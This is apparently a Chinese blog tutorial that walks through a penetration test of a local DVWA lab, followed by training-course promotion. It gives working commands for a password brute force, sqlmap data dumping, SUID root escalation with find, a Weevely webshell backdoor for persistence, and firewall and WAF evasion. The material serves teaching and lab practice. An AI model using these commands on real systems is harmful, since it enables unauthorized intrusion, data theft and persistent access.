网络安全渗透测试全流程实战:从信息搜集到权限维持(附工具命令 + 靶场演示)

文章前言

渗透测试的核心不是 “黑客炫技”,而是有章法的安全评估流程。本文完全按照企业真实渗透测试标准,从 “信息搜集→漏洞扫描→漏洞利用→权限提升→内网渗透→权限维持→报告输出”7 大环节,结合 DVWA 靶场和真实案例,手把手教你落地操作,每个步骤都附工具命令和避坑点。

一、前期准备:环境与工具清单(新手直接抄)

1. 必备环境

  • 操作系统:Kali Linux 2023.4(自带 80% 渗透工具,无需单独安装)
  • 虚拟机:VMware Workstation 17(避免直接在物理机操作,防止误操作)
  • 靶场:DVWA(Damn Vulnerable Web Application,新手入门首选,文末附部署教程)

2. 核心工具清单(按流程排序)

流程阶段 工具名称 作用 安装方式(Kali 系统)
信息搜集 Nmap 端口 / 服务扫描 自带,终端输入nmap即可使用
信息搜集 OneForAll 子域名收集 git clone https://github.com/shmilylty/OneForAll.git
漏洞扫描 Nikto Web 漏洞扫描 自带,终端输入nikto
漏洞利用 Burp Suite 抓包 / 改包 / 漏洞验证 自带,应用菜单中搜索 “Burp”
漏洞利用 sqlmap SQL 注入自动化利用 自带,终端输入sqlmap
权限提升 LinEnum Linux 提权信息搜集 git clone https://github.com/rebootuser/LinEnum.git
权限维持 Weevely 生成 webshell 自带,终端输入weevely

二、渗透测试全流程实战(DVWA 靶场演示)

阶段 1:信息搜集 —— 摸清目标 “底细”(最关键的第一步)

核心目标:获取目标 IP、开放端口、运行服务、子域名等基础信息,为后续漏洞挖掘找突破口。

1. 端口与服务扫描(Nmap 实战)

命令 1:基础端口扫描(扫描目标前 1000 个常用端口)

nmap -sS -T4 192.168.1.105  # -sS:半开放扫描(快且隐蔽);-T4:扫描速度等级4

扫描结果解读

PORT   STATE SERVICE VERSION

80/tcp open  http    Apache httpd 2.4.49  # 开放80端口,运行Apache 2.4.49服务

3306/tcp open mysql   MySQL 5.7.34        # 开放3306端口,运行MySQL 5.7.34

关键发现:Apache 2.4.49 存在已知漏洞(CVE-2021-41773),可后续重点测试。

2. 子域名搜集(OneForAll 实战)

若目标是域名(如test.com),用 OneForAll 批量收集子域名:

cd OneForAll

python oneforall.py --target test.com run  # 针对test.com收集子域名

输出结果:会生成result/``test.com``.csv 文件,包含子域名、IP、状态码等信息,可筛选出 “200 OK” 的存活子域名进一步测试。

3. Web 服务信息探测(Nikto 实战)

针对 80 端口的 Web 服务,用 Nikto 扫描潜在漏洞:

nikto -h http://192.168.1.105  # -h:指定目标URL

关键漏洞提示

\+ Server: Apache/2.4.49

\+ The anti-clickjacking X-Frame-Options header is not present.

\+ The X-Content-Type-Options header is not set.

\+ OSVDB-3233: /phpmyadmin/: PHPMyAdmin directory found.  # 发现phpmyadmin后台

阶段 2:漏洞扫描与验证 —— 找到 “突破口”

1. Burp Suite 抓包分析(以 DVWA 登录页为例)

步骤 1:配置代理

  • 打开 Burp Suite → 点击 “Proxy” → “Options” → 新增代理:127.0.0.1:8080
  • 浏览器(Kali 自带 Firefox)设置代理:IP=127.0.0.1,端口 = 8080

步骤 2:抓包改包测试

  1. 访问http://192.168.1.105/dvwa/login.php,输入账号admin、密码123,点击登录
  2. Burp 拦截请求,查看 POST 数据:
username=admin\&password=123\&Login=Login
  1. 发送到 “Intruder” 进行暴力破解(测试弱密码):
  • 选中password=123中的123,设置为变量
  • 加载密码字典(Kali 自带字典路径:/usr/share/wordlists/rockyou.txt
  • 开始攻击,发现密码为password时返回状态码 200(登录成功)
2. SQL 注入漏洞利用(sqlmap 实战)

以 DVWA 的 “SQL Injection” 模块为例:

目标 URLhttp://192.168.1.105/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

步骤 1:判断是否存在 SQL 注入

sqlmap -u "http://192.168.1.105/dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit#" --cookie="security=low; PHPSESSID=abc123"# --cookie:携带登录后的Cookie

结果提示Parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N](确认存在注入)

步骤 2:获取数据库名称

sqlmap -u 目标URL --cookie=xxx --dbs  # --dbs:列出所有数据库

输出:发现dvwa数据库(靶场核心数据库)

步骤 3:获取表和数据

sqlmap -u 目标URL --cookie=xxx -D dvwa --tables  # -D:指定数据库;--tables:列出表

sqlmap -u 目标URL --cookie=xxx -D dvwa -T users --dump  # -T:指定表;--dump:导出数据

成功获取:users 表中的账号密码(密码经 MD5 加密,可用https://cmd5.com/解密)

阶段 3:权限提升 —— 从 “Web 权限” 到 “系统权限”

假设已通过文件上传漏洞上传 webshell,获取了 DVWA 服务器的低权限 shell(用户:www-data),需提升至 root 权限。

1. 提权信息搜集(LinEnum 实战)
cd /tmp  # 切换到可写目录

git clone https://github.com/rebootuser/LinEnum.git

cd LinEnum

bash linenum.sh  # 运行脚本搜集提权线索

关键线索

\[+] SUID binaries found:

-rwsr-xr-x 1 root root 14384 Jan 26  2021 /usr/bin/find  # find命令有SUID权限,可利用提权
2. 利用 SUID 提权(find 命令实战)
find / -name test.txt -exec /bin/sh -p \\;  # 利用find的SUID权限执行shell

提权成功:终端显示#(root 权限标志),可执行whoami确认:

\# whoami

root

阶段 4:权限维持 —— 留下 “后门” 便于后续访问

提权后需留下持久化后门,避免重新渗透。

1. 生成 webshell 后门(Weevely 实战)
weevely generate mypassword /tmp/backdoor.php  # 生成密码为mypassword的webshell

输出Generated backdoor with password 'mypassword' to: /tmp/backdoor.php

2. 上传后门到目标服务器

通过之前获取的 shell,将backdoor.php上传到网站根目录(如/var/www/html/)。

3. 连接后门
weevely http://192.168.1.105/backdoor.php mypassword  # 连接webshell

成功连接:直接获取目标服务器 shell,后续可随时访问。

三、实战避坑指南(新手必看)

  1. Nmap 扫描被防火墙拦截?

    改用-sT(全连接扫描)或-sU(UDP 扫描),加-f(分片扫描)绕过防火墙检测。

  2. sqlmap 跑不出数据?

    检查 Cookie 是否过期(重新登录获取),加--delay 1(延迟 1 秒)避免被 WAF 拦截。

  3. 提权失败?

    优先尝试 Kali 自带的searchsploit搜索系统版本漏洞,例如:

searchsploit Ubuntu 20.04  # 搜索Ubuntu 20.04的提权漏洞

四、DVWA 靶场部署教程(10 分钟搞定)

  1. 安装 LAMP 环境(Kali 系统):
sudo apt install apache2 mysql-server php php-mysql -y
  1. 启动服务:
sudo systemctl start apache2 mysql
  1. 下载并部署 DVWA:
cd /var/www/html

sudo git clone https://github.com/digininja/DVWA.git

sudo chmod -R 777 DVWA
  1. 访问http://localhost/DVWA/setup.php,点击 “Create / Reset Database”,默认账号admin,密码password

五、渗透测试报告模板(简化版)

项目 内容
测试目标 192.168.1.105(DVWA 靶场)
高危漏洞 1. Apache 2.4.49 远程代码执行(CVE-2021-41773);2. SQL 注入漏洞
修复建议 1. 升级 Apache 至 2.4.50 以上;2. 对用户输入进行参数化查询
测试时间 2025-09-04
测试人员 渗透测试工程师
本文所有操作均基于合法授权的靶场环境,未经授权渗透他人系统属于违法行为,需承担法律责任!

文章来自网上,侵权请联系博主

学习资源

如果你是也准备转行学习网络安全(黑客)或者正在学习,这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你

知识库由360智榜样学习中心独家打造出品,旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力,熟练掌握基础攻防到深度对抗。

读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)

在这里插入图片描述

一、知识库价值

深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。

广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。

实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。

二、 部分核心内容展示

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

在这里插入图片描述

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。

1、网络安全意识

img

2、Linux操作系统

img

3、WEB架构基础与HTTP协议

img

4、Web渗透测试

img

5、渗透测试案例分享

img

6、渗透测试实战技巧

图片

7、攻防对战实战

图片

8、CTF之MISC实战讲解

图片

三、适合学习的人群

基础适配人群

  1. 零基础转型者‌:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌;
  2. 开发/运维人员‌:具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能,实现职业方向拓展‌或者转行就业;
  3. 应届毕业生‌:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期‌;

能力提升适配

1、‌技术爱好者‌:适合对攻防技术有强烈兴趣,希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌;

2、安全从业者‌:帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌;

3、‌合规需求者‌:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员‌;

因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】

‌;

因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】

在这里插入图片描述

Logo

火山引擎开发者社区是火山引擎打造的AI技术生态平台,聚焦Agent与大模型开发,提供豆包系列模型(图像/视频/视觉)、智能分析与会话工具,并配套评测集、动手实验室及行业案例库。社区通过技术沙龙、挑战赛等活动促进开发者成长,新用户可领50万Tokens权益,助力构建智能应用。

更多推荐